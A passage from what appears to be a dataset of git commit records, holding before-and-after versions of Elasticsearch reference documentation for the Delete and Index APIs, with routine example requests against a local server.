request.\n\n[float]\n[[delete-parent]]\n=== Parent\n\nThe `parent` parameter can be set, which will basically be the same as\nsetting the routing parameter.\n\nNote that deleting a parent document does not automatically delete its\nchildren. One way of deleting all child documents given a parent's id is\nto use the <<docs-delete-by-query,Delete By Query API>> to perform a\ndelete on the child index with the automatically generated (and indexed)\nfield _parent, which is in the format parent_type#parent_id.\n\nWhen deleting a child document its parent id must be specified, otherwise\nthe delete request will be rejected and a `RoutingMissingException` will be\nthrown instead.\n\n[float]\n[[delete-index-creation]]\n=== Automatic index creation\n\nThe delete operation automatically creates an index if it has not been\ncreated before (check out the <<indices-create-index,create index API>>\nfor manually creating an index), and also automatically creates a\ndynamic type mapping for the specific type if it has not been created\nbefore (check out the <<indices-put-mapping,put mapping>>\nAPI for manually creating type mapping).\n\n[float]\n[[delete-distributed]]\n=== Distributed\n\nThe delete operation gets hashed into a specific shard id. 
It then gets\nredirected into the primary shard within that id group, and replicated\n(if needed) to shard replicas within that id group.\n\n[float]\n[[delete-wait-for-active-shards]]\n=== Wait For Active Shards\n\nWhen making delete requests, you can set the `wait_for_active_shards`\nparameter to require a minimum number of shard copies to be active\nbefore starting to process the delete request. See\n<<index-wait-for-active-shards,here>> for further details and a usage\nexample.\n\n[float]\n[[delete-refresh]]\n=== Refresh\n\nControl when the changes made by this request are visible to search. See\n<<docs-refresh>>.\n\n\n[float]\n[[delete-timeout]]\n=== Timeout\n\nThe primary shard assigned to perform the delete operation might not be\navailable when the delete operation is executed. Some reasons for this\nmight be that the primary shard is currently recovering from a store\nor undergoing relocation. By default, the delete operation will wait on\nthe primary shard to become available for up to 1 minute before failing\nand responding with an error. The `timeout` parameter can be used to\nexplicitly specify how long it waits. Here is an example of setting it\nto 5 minutes:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1?timeout=5m'\n--------------------------------------------------\n","old_contents":"[[docs-delete]]\n== Delete API\n\nThe delete API allows to delete a typed JSON document from a specific\nindex based on its id. The following example deletes the JSON document\nfrom an index called twitter, under a type called tweet, with id valued\n1:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1'\n--------------------------------------------------\n\nThe result of the above delete operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 10,\n \"failed\" : 0,\n \"successful\" : 10\n },\n \"found\" : true,\n \"_index\" : \"twitter\",\n \"_type\" : \"tweet\",\n \"_id\" : \"1\",\n \"_version\" : 2,\n \"result: deleted\"\n}\n--------------------------------------------------\n\n[float]\n[[delete-versioning]]\n=== Versioning\n\nEach document indexed is versioned. When deleting a document, the\n`version` can be specified to make sure the relevant document we are\ntrying to delete is actually being deleted and it has not changed in the\nmeantime. Every write operation executed on a document, deletes included,\ncauses its version to be incremented.\n\n[float]\n[[delete-routing]]\n=== Routing\n\nWhen indexing using the ability to control the routing, in order to\ndelete a document, the routing value should also be provided. For\nexample:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1?routing=kimchy'\n--------------------------------------------------\n\nThe above will delete a tweet with id 1, but will be routed based on the\nuser. 
Note, issuing a delete without the correct routing, will cause the\ndocument to not be deleted.\n\nWhen the `_routing` mapping is set as `required` and no routing value is\nspecified, the delete api will throw a `RoutingMissingException` and reject\nthe request.\n\n[float]\n[[delete-parent]]\n=== Parent\n\nThe `parent` parameter can be set, which will basically be the same as\nsetting the routing parameter.\n\nNote that deleting a parent document does not automatically delete its\nchildren. One way of deleting all child documents given a parent's id is\nto use the <<docs-delete-by-query,Delete By Query API>> to perform a\n index with the automatically generated (and indexed)\nfield _parent, which is in the format parent_type#parent_id.\n\nWhen deleting a child document its parent id must be specified, otherwise\nthe delete request will be rejected and a `RoutingMissingException` will be\nthrown instead.\n\n[float]\n[[delete-index-creation]]\n=== Automatic index creation\n\nThe delete operation automatically creates an index if it has not been\ncreated before (check out the <<indices-create-index,create index API>>\nfor manually creating an index), and also automatically creates a\ndynamic type mapping for the specific type if it has not been created\nbefore (check out the <<indices-put-mapping,put mapping>>\nAPI for manually creating type mapping).\n\n[float]\n[[delete-distributed]]\n=== Distributed\n\nThe delete operation gets hashed into a specific shard id. It then gets\nredirected into the primary shard within that id group, and replicated\n(if needed) to shard replicas within that id group.\n\n[float]\n[[delete-wait-for-active-shards]]\n=== Wait For Active Shards\n\nWhen making delete requests, you can set the `wait_for_active_shards`\nparameter to require a minimum number of shard copies to be active\nbefore starting to process the delete request. See\n<<index-wait-for-active-shards,here>> for further details and a usage\nexample.\n\n[float]\n[[delete-refresh]]\n=== Refresh\n\nControl when the changes made by this request are visible to search. See\n<<docs-refresh>>.\n\n\n[float]\n[[delete-timeout]]\n=== Timeout\n\nThe primary shard assigned to perform the delete operation might not be\navailable when the delete operation is executed. Some reasons for this\nmight be that the primary shard is currently recovering from a store\nor undergoing relocation. By default, the delete operation will wait on\nthe primary shard to become available for up to 1 minute before failing\nand responding with an error. The `timeout` parameter can be used to\nexplicitly specify how long it waits. 
Here is an example of setting it\nto 5 minutes:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1?timeout=5m'\n--------------------------------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ac7a4d279d9ab020e0e47ebb2301fa1275f5328","subject":"[Docs] Fix typo in index API documentation (#43740)","message":"[Docs] Fix typo in index API documentation (#43740)\n\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/docs\/index_.asciidoc","new_file":"docs\/reference\/docs\/index_.asciidoc","new_contents":"[[docs-index_]]\n== Index API\n\nIMPORTANT: See <<removal-of-types>>.\n\nThe index API adds or updates a typed JSON document in a specific index,\nmaking it searchable. The following example inserts the JSON document\ninto the \"twitter\" index, under a type called `_doc` with an id of 1:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe result of the above index operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n },\n \"_index\" : \"twitter\",\n \"_type\" : \"_doc\",\n \"_id\" : \"1\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"result\" : \"created\"\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"successful\" : 2\/\"successful\" : 1\/]\n\nThe `_shards` header provides information about the replication process of the index operation:\n\n`total`:: Indicates how many shard copies (primary and replica shards) the index operation should be executed on.\n`successful`:: Indicates the number of shard copies the index operation succeeded on.\n`failed`:: An array that contains replication-related errors in the case an index operation failed on a replica shard.\n\nThe index operation is successful in the case `successful` is at least 1.\n\nNOTE: Replica shards may not all be started when an indexing operation successfully returns (by default, only the\n primary is required, but this behavior can be <<index-wait-for-active-shards,changed>>). In that case,\n `total` will be equal to the total shards based on the `number_of_replicas` setting and `successful` will be\n equal to the number of shards started (primary plus replicas). If there were no failures, the `failed` will be 0.\n\n[float]\n[[index-creation]]\n=== Automatic Index Creation\n\nThe index operation automatically creates an index if it does not already\nexist, and applies any <<indices-templates,index templates>> that are\nconfigured. The index operation also creates a dynamic type mapping for the\nspecified type if one does not already exist. By default, new fields and\nobjects will automatically be added to the mapping definition for the specified\ntype if needed. Check out the <<mapping,mapping>> section for more information\non mapping definitions, and the <<indices-put-mapping,put mapping>> API for\ninformation about updating type mappings manually.\n\nAutomatic index creation is controlled by the `action.auto_create_index`\nsetting. 
This setting defaults to `true`, meaning that indices are always\nautomatically created. Automatic index creation can be permitted only for\nindices matching certain patterns by changing the value of this setting to a\ncomma-separated list of these patterns. It can also be explicitly permitted and\nforbidden by prefixing patterns in the list with a `+` or `-`. Finally it can\nbe completely disabled by changing this setting to `false`.\n\n[source,js]\n--------------------------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"twitter,index10,-index1*,+ind*\" <1>\n }\n}\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"false\" <2>\n }\n}\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"true\" <3>\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Permit only the auto-creation of indices called `twitter`, `index10`, no\nother index matching `index1*`, and any other index matching `ind*`. The\npatterns are matched in the order in which they are given.\n\n<2> Completely disable the auto-creation of indices.\n\n<3> Permit the auto-creation of indices with any name. This is the default.\n\n[float]\n[[operation-type]]\n=== Operation Type\n\nThe index operation also accepts an `op_type` that can be used to force\na `create` operation, allowing for \"put-if-absent\" behavior. When\n`create` is used, the index operation will fail if a document by that id\nalready exists in the index.\n\nHere is an example of using the `op_type` parameter:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?op_type=create\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nAnother option to specify `create` is to use the following uri:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1\/_create\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Automatic ID Generation\n\nThe index operation can be executed without specifying the id. In such a\ncase, an id will be generated automatically. In addition, the `op_type`\nwill automatically be set to `create`. 
Here is an example (note the\n*POST* used instead of *PUT*):\n\n[source,js]\n--------------------------------------------------\nPOST twitter\/_doc\/\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe result of the above index operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n },\n \"_index\" : \"twitter\",\n \"_type\" : \"_doc\",\n \"_id\" : \"W0tpsmIBdwcYyG50zbta\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"result\": \"created\"\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/W0tpsmIBdwcYyG50zbta\/$body._id\/ s\/\"successful\" : 2\/\"successful\" : 1\/]\n\n[float]\n[[optimistic-concurrency-control-index]]\n=== Optimistic concurrency control\n\nIndex operations can be made conditional and only be performed if the last\nmodification to the document was assigned the sequence number and primary \nterm specified by the `if_seq_no` and `if_primary_term` parameters. If a\nmismatch is detected, the operation will result in a `VersionConflictException`\nand a status code of 409. See <<optimistic-concurrency-control>> for more details. \n\n[float]\n[[index-routing]]\n=== Routing\n\nBy default, shard placement \u2014 or `routing` \u2014 is controlled by using a\nhash of the document's id value. For more explicit control, the value\nfed into the hash function used by the router can be directly specified\non a per-operation basis using the `routing` parameter. For example:\n\n[source,js]\n--------------------------------------------------\nPOST twitter\/_doc?routing=kimchy\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn the example above, the \"_doc\" document is routed to a shard based on\nthe `routing` parameter provided: \"kimchy\".\n\nWhen setting up explicit mapping, the `_routing` field can be optionally\nused to direct the index operation to extract the routing value from the\ndocument itself. This does come at the (very minimal) cost of an\nadditional document parsing pass. If the `_routing` mapping is defined\nand set to be `required`, the index operation will fail if no routing\nvalue is provided or extracted.\n\n[float]\n[[index-distributed]]\n=== Distributed\n\nThe index operation is directed to the primary shard based on its route\n(see the Routing section above) and performed on the actual node\ncontaining this shard. After the primary shard completes the operation,\nif needed, the update is distributed to applicable replicas.\n\n[float]\n[[index-wait-for-active-shards]]\n=== Wait For Active Shards\n\nTo improve the resiliency of writes to the system, indexing operations\ncan be configured to wait for a certain number of active shard copies\nbefore proceeding with the operation. If the requisite number of active\nshard copies are not available, then the write operation must wait and\nretry, until either the requisite shard copies have started or a timeout\noccurs. By default, write operations only wait for the primary shards\nto be active before proceeding (i.e. `wait_for_active_shards=1`).\nThis default can be overridden in the index settings dynamically\nby setting `index.write.wait_for_active_shards`. 
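\n\nFor example, the following sketch (it assumes an existing `twitter` index with at least one replica configured) raises the default to two active shard copies for all subsequent writes to that index:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_settings\n{\n \"index.write.wait_for_active_shards\": \"2\"\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n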
To alter this behavior\nper operation, the `wait_for_active_shards` request parameter can be used.\n\nValid values are `all` or any positive integer up to the total number\nof configured copies per shard in the index (which is `number_of_replicas+1`).\nSpecifying a negative value or a number greater than the number of\nshard copies will throw an error.\n\nFor example, suppose we have a cluster of three nodes, `A`, `B`, and `C` and\nwe create an index `index` with the number of replicas set to 3 (resulting in\n4 shard copies, one more copy than there are nodes). If we\nattempt an indexing operation, by default the operation will only ensure\nthe primary copy of each shard is available before proceeding. This means\nthat even if `B` and `C` went down, and `A` hosted the primary shard copies,\nthe indexing operation would still proceed with only one copy of the data.\nIf `wait_for_active_shards` is set on the request to `3` (and all 3 nodes\nare up), then the indexing operation will require 3 active shard copies\nbefore proceeding, a requirement which should be met because there are 3\nactive nodes in the cluster, each one holding a copy of the shard. However,\nif we set `wait_for_active_shards` to `all` (or to `4`, which is the same),\nthe indexing operation will not proceed as we do not have all 4 copies of\neach shard active in the index. The operation will timeout\nunless a new node is brought up in the cluster to host the fourth copy of\nthe shard.\n\nIt is important to note that this setting greatly reduces the chances of\nthe write operation not writing to the requisite number of shard copies,\nbut it does not completely eliminate the possibility, because this check\noccurs before the write operation commences. Once the write operation\nis underway, it is still possible for replication to fail on any number of\nshard copies but still succeed on the primary. The `_shards` section of the\nwrite operation's response reveals the number of shard copies on which\nreplication succeeded\/failed.\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n[float]\n[[index-refresh]]\n=== Refresh\n\nControl when the changes made by this request are visible to search. See\n<<docs-refresh,refresh>>.\n\n[float]\n[[index-noop]]\n=== Noop Updates\n\nWhen updating a document using the index API a new version of the document is\nalways created even if the document hasn't changed. If this isn't acceptable\nuse the `_update` API with `detect_noop` set to true. This option isn't\navailable on the index API because the index API doesn't fetch the old source\nand isn't able to compare it against the new source.\n\nThere isn't a hard and fast rule about when noop updates aren't acceptable.\nIt's a combination of lots of factors like how frequently your data source\nsends updates that are actually noops and how many queries per second\nElasticsearch runs on the shard receiving the updates.\n\n[float]\n[[timeout]]\n=== Timeout\n\nThe primary shard assigned to perform the index operation might not be\navailable when the index operation is executed. Some reasons for this\nmight be that the primary shard is currently recovering from a gateway\nor undergoing relocation. By default, the index operation will wait on\nthe primary shard to become available for up to 1 minute before failing\nand responding with an error. 
The `timeout` parameter can be used to\nexplicitly specify how long it waits. Here is an example of setting it\nto 5 minutes:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?timeout=5m\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[index-versioning]]\n=== Versioning\n\nEach indexed document is given a version number. By default, \ninternal versioning is used that starts at 1 and increments\nwith each update, deletes included. Optionally, the version number can be\nset to an external value (for example, if maintained in a\ndatabase). To enable this functionality, `version_type` should be set to\n`external`. The value provided must be a numeric, long value greater than or equal to 0,\nand less than around 9.2e+18. \n\nWhen using the external version type, the system checks to see if\nthe version number passed to the index request is greater than the\nversion of the currently stored document. If true, the document will be\nindexed and the new version number used. If the value provided is less\nthan or equal to the stored document's version number, a version\nconflict will occur and the index operation will fail. For example:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?version=2&version_type=external\n{\n \"message\" : \"elasticsearch now has versioning support, double cool!\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n*NOTE:* Versioning is completely real time, and is not affected by the\nnear real time aspects of search operations. If no version is provided,\nthen the operation is executed without any version checks.\n\nThe above will succeed since the supplied version of 2 is higher than\nthe current document version of 1. If the document was already updated\nand its version was set to 2 or higher, the indexing command will fail\nand result in a conflict (409 http status code).\n\nA nice side effect is that there is no need to maintain strict ordering\nof async indexing operations executed as a result of changes to a source\ndatabase, as long as version numbers from the source database are used.\nEven the simple case of updating the Elasticsearch index using data from\na database is simplified if external versioning is used, as only the\nlatest version will be used if the index operations arrive out of order for\nwhatever reason.\n\n[float]\n==== Version types\n\nNext to the `external` version type explained above, Elasticsearch\nalso supports other types for specific use cases. Here is an overview of\nthe different version types and their semantics.\n\n`internal`:: Only index the document if the given version is identical to the version\nof the stored document.\nifdef::asciidoctor[]\ndeprecated:[6.7.0, \"Please use `if_seq_no` & `if_primary_term` instead. See <<optimistic-concurrency-control>> for more details.\"]\nendif::[]\nifndef::asciidoctor[]\ndeprecated[6.7.0, Please use `if_seq_no` & `if_primary_term` instead. See <<optimistic-concurrency-control>> for more details.]\nendif::[]\n\n\n`external` or `external_gt`:: Only index the document if the given version is strictly higher\nthan the version of the stored document *or* if there is no existing document. The given\nversion will be used as the new version and will be stored with the new document. 
The supplied\nversion must be a non-negative long number.\n\n`external_gte`:: Only index the document if the given version is *equal* or higher\nthan the version of the stored document. If there is no existing document\nthe operation will succeed as well. The given version will be used as the new version\nand will be stored with the new document. The supplied version must be a non-negative long number.\n\n*NOTE*: The `external_gte` version type is meant for special use cases and\nshould be used with care. If used incorrectly, it can result in loss of data.\nThere is another option, `force`, which is deprecated because it can cause\nprimary and replica shards to diverge.\n\n","old_contents":"[[docs-index_]]\n== Index API\n\nIMPORTANT: See <<removal-of-types>>.\n\nThe index API adds or updates a typed JSON document in a specific index,\nmaking it searchable. The following example inserts the JSON document\ninto the \"twitter\" index, under a type called `_doc` with an id of 1:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe result of the above index operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n },\n \"_index\" : \"twitter\",\n \"_type\" : \"_doc\",\n \"_id\" : \"1\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"result\" : \"created\"\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"successful\" : 2\/\"successful\" : 1\/]\n\nThe `_shards` header provides information about the replication process of the index operation:\n\n`total`:: Indicates how many shard copies (primary and replica shards) the index operation should be executed on.\n`successful`:: Indicates the number of shard copies the index operation succeeded on.\n`failed`:: An array that contains replication-related errors in the case an index operation failed on a replica shard.\n\nThe index operation is successful in the case `successful` is at least 1.\n\nNOTE: Replica shards may not all be started when an indexing operation successfully returns (by default, only the\n primary is required, but this behavior can be <<index-wait-for-active-shards,changed>>). In that case,\n `total` will be equal to the total shards based on the `number_of_replicas` setting and `successful` will be\n equal to the number of shards started (primary plus replicas). If there were no failures, the `failed` will be 0.\n\n[float]\n[[index-creation]]\n=== Automatic Index Creation\n\nThe index operation automatically creates an index if it does not already\nexist, and applies any <<indices-templates,index templates>> that are\nconfigured. The index operation also creates a dynamic type mapping for the\nspecified type if one does not already exist. By default, new fields and\nobjects will automatically be added to the mapping definition for the specified\ntype if needed. Check out the <<mapping,mapping>> section for more information\non mapping definitions, and the <<indices-put-mapping,put mapping>> API for\ninformation about updating type mappings manually.\n\nAutomatic index creation is controlled by the `action.auto_create_index`\nsetting. This setting defaults to `true`, meaning that indices are always\nautomatically created. 
Automatic index creation can be permitted only for\nindices matching certain patterns by changing the value of this setting to a\ncomma-separated list of these patterns. It can also be explicitly permitted and\nforbidden by prefixing patterns in the list with a `+` or `-`. Finally it can\nbe completely disabled by changing this setting to `false`.\n\n[source,js]\n--------------------------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"twitter,index10,-index1*,+ind*\" <1>\n }\n}\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"false\" <2>\n }\n}\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"action.auto_create_index\": \"true\" <3>\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Permit only the auto-creation of indices called `twitter`, `index10`, no\nother index matching `index1*`, and any other index matching `ind*`. The\npatterns are matched in the order in which they are given.\n\n<2> Completely disable the auto-creation of indices.\n\n<3> Permit the auto-creation of indices with any name. This is the default.\n\n[float]\n[[operation-type]]\n=== Operation Type\n\nThe index operation also accepts an `op_type` that can be used to force\na `create` operation, allowing for \"put-if-absent\" behavior. When\n`create` is used, the index operation will fail if a document by that id\nalready exists in the index.\n\nHere is an example of using the `op_type` parameter:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?op_type=create\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nAnother option to specify `create` is to use the following uri:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1\/_create\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Automatic ID Generation\n\nThe index operation can be executed without specifying the id. In such a\ncase, an id will be generated automatically. In addition, the `op_type`\nwill automatically be set to `create`. 
Here is an example (note the\n*POST* used instead of *PUT*):\n\n[source,js]\n--------------------------------------------------\nPOST twitter\/_doc\/\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe result of the above index operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n },\n \"_index\" : \"twitter\",\n \"_type\" : \"_doc\",\n \"_id\" : \"W0tpsmIBdwcYyG50zbta\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"result\": \"created\"\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/W0tpsmIBdwcYyG50zbta\/$body._id\/ s\/\"successful\" : 2\/\"successful\" : 1\/]\n\n[float]\n[[optimistic-concurrency-control-index]]\n=== Optimistic concurrency control\n\nIndex operations can be made conditional and only be performed if the last\nmodification to the document was assigned the sequence number and primary \nterm specified by the `if_seq_no` and `if_primary_term` parameters. If a\nmismatch is detected, the operation will result in a `VersionConflictException`\nand a status code of 409. See <<optimistic-concurrency-control>> for more details. \n\n[float]\n[[index-routing]]\n=== Routing\n\nBy default, shard placement \u2014 or `routing` \u2014 is controlled by using a\nhash of the document's id value. For more explicit control, the value\nfed into the hash function used by the router can be directly specified\non a per-operation basis using the `routing` parameter. For example:\n\n[source,js]\n--------------------------------------------------\nPOST twitter\/_doc?routing=kimchy\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn the example above, the \"_doc\" document is routed to a shard based on\nthe `routing` parameter provided: \"kimchy\".\n\nWhen setting up explicit mapping, the `_routing` field can be optionally\nused to direct the index operation to extract the routing value from the\ndocument itself. This does come at the (very minimal) cost of an\nadditional document parsing pass. If the `_routing` mapping is defined\nand set to be `required`, the index operation will fail if no routing\nvalue is provided or extracted.\n\n[float]\n[[index-distributed]]\n=== Distributed\n\nThe index operation is directed to the primary shard based on its route\n(see the Routing section above) and performed on the actual node\ncontaining this shard. After the primary shard completes the operation,\nif needed, the update is distributed to applicable replicas.\n\n[float]\n[[index-wait-for-active-shards]]\n=== Wait For Active Shards\n\nTo improve the resiliency of writes to the system, indexing operations\ncan be configured to wait for a certain number of active shard copies\nbefore proceeding with the operation. If the requisite number of active\nshard copies are not available, then the write operation must wait and\nretry, until either the requisite shard copies have started or a timeout\noccurs. By default, write operations only wait for the primary shards\nto be active before proceeding (i.e. `wait_for_active_shards=1`).\nThis default can be overridden in the index settings dynamically\nby setting `index.write.wait_for_active_shards`. 
To alter this behavior\nper operation, the `wait_for_active_shards` request parameter can be used.\n\nValid values are `all` or any positive integer up to the total number\nof configured copies per shard in the index (which is `number_of_replicas+1`).\nSpecifying a negative value or a number greater than the number of\nshard copies will throw an error.\n\nFor example, suppose we have a cluster of three nodes, `A`, `B`, and `C` and\nwe create an index `index` with the number of replicas set to 3 (resulting in\n4 shard copies, one more copy than there are nodes). If we\nattempt an indexing operation, by default the operation will only ensure\nthe primary copy of each shard is available before proceeding. This means\nthat even if `B` and `C` went down, and `A` hosted the primary shard copies,\nthe indexing operation would still proceed with only one copy of the data.\nIf `wait_for_active_shards` is set on the request to `3` (and all 3 nodes\nare up), then the indexing operation will require 3 active shard copies\nbefore proceeding, a requirement which should be met because there are 3\nactive nodes in the cluster, each one holding a copy of the shard. However,\nif we set `wait_for_active_shards` to `all` (or to `4`, which is the same),\nthe indexing operation will not proceed as we do not have all 4 copies of\neach shard active in the index. The operation will timeout\nunless a new node is brought up in the cluster to host the fourth copy of\nthe shard.\n\nIt is important to note that this setting greatly reduces the chances of\nthe write operation not writing to the requisite number of shard copies,\nbut it does not completely eliminate the possibility, because this check\noccurs before the write operation commences. Once the write operation\nis underway, it is still possible for replication to fail on any number of\nshard copies but still succeed on the primary. The `_shards` section of the\nwrite operation's response reveals the number of shard copies on which\nreplication succeeded\/failed.\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 2,\n \"failed\" : 0,\n \"successful\" : 2\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n[float]\n[[index-refresh]]\n=== Refresh\n\nControl when the changes made by this request are visible to search. See\n<<docs-refresh,refresh>>.\n\n[float]\n[[index-noop]]\n=== Noop Updates\n\nWhen updating a document using the index API a new version of the document is\nalways created even if the document hasn't changed. If this isn't acceptable\nuse the `_update` API with `detect_noop` set to true. This option isn't\navailable on the index API because the index API doesn't fetch the old source\nand isn't able to compare it against the new source.\n\nThere isn't a hard and fast rule about when noop updates aren't acceptable.\nIt's a combination of lots of factors like how frequently your data source\nsends updates that are actually noops and how many queries per second\nElasticsearch runs on the shard receiving the updates.\n\n[float]\n[[timeout]]\n=== Timeout\n\nThe primary shard assigned to perform the index operation might not be\navailable when the index operation is executed. Some reasons for this\nmight be that the primary shard is currently recovering from a gateway\nor undergoing relocation. By default, the index operation will wait on\nthe primary shard to become available for up to 1 minute before failing\nand responding with an error. 
The `timeout` parameter can be used to\nexplicitly specify how long it waits. Here is an example of setting it\nto 5 minutes:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?timeout=5m\n{\n \"user\" : \"kimchy\",\n \"post_date\" : \"2009-11-15T14:12:12\",\n \"message\" : \"trying out Elasticsearch\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[index-versioning]]\n=== Versioning\n\nEach indexed document is given a version number. By default, \ninternal versioning is used that starts at 1 and increments\nwith each update, deletes included. Optionally, the version number can be\nset to an external value (for example, if maintained in a\ndatabase). To enable this functionality, `version_type` should be set to\n`external`. The value provided must be a numeric, long value greater than or equal to 0,\nand less than around 9.2e+18. \n\nWhen using the external version type, the system checks to see if\nthe version number passed to the index request is greater than the\nversion of the currently stored document. If true, the document will be\nindexed and the new version number used. If the value provided is less\nthan or equal to the stored document's version number, a version\nconflict will occur and the index operation will fail. For example:\n\n[source,js]\n--------------------------------------------------\nPUT twitter\/_doc\/1?version=2&version_type=external\n{\n \"message\" : \"elasticsearch now has versioning support, double cool!\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n*NOTE:* Versioning is completely real time, and is not affected by the\nnear real time aspects of search operations. If no version is provided,\nthen the operation is executed without any version checks.\n\nThe above will succeed since the the supplied version of 2 is higher than\nthe current document version of 1. If the document was already updated\nand its version was set to 2 or higher, the indexing command will fail\nand result in a conflict (409 http status code).\n\nA nice side effect is that there is no need to maintain strict ordering\nof async indexing operations executed as a result of changes to a source\ndatabase, as long as version numbers from the source database are used.\nEven the simple case of updating the Elasticsearch index using data from\na database is simplified if external versioning is used, as only the\nlatest version will be used if the index operations arrive out of order for\nwhatever reason.\n\n[float]\n==== Version types\n\nNext to the `external` version type explained above, Elasticsearch\nalso supports other types for specific use cases. Here is an overview of\nthe different version types and their semantics.\n\n`internal`:: Only index the document if the given version is identical to the version\nof the stored document.\nifdef::asciidoctor[]\ndeprecated:[6.7.0, \"Please use `if_seq_no` & `if_primary_term` instead. See <<optimistic-concurrency-control>> for more details.\"]\nendif::[]\nifndef::asciidoctor[]\ndeprecated[6.7.0, Please use `if_seq_no` & `if_primary_term` instead. See <<optimistic-concurrency-control>> for more details.]\nendif::[]\n\n\n`external` or 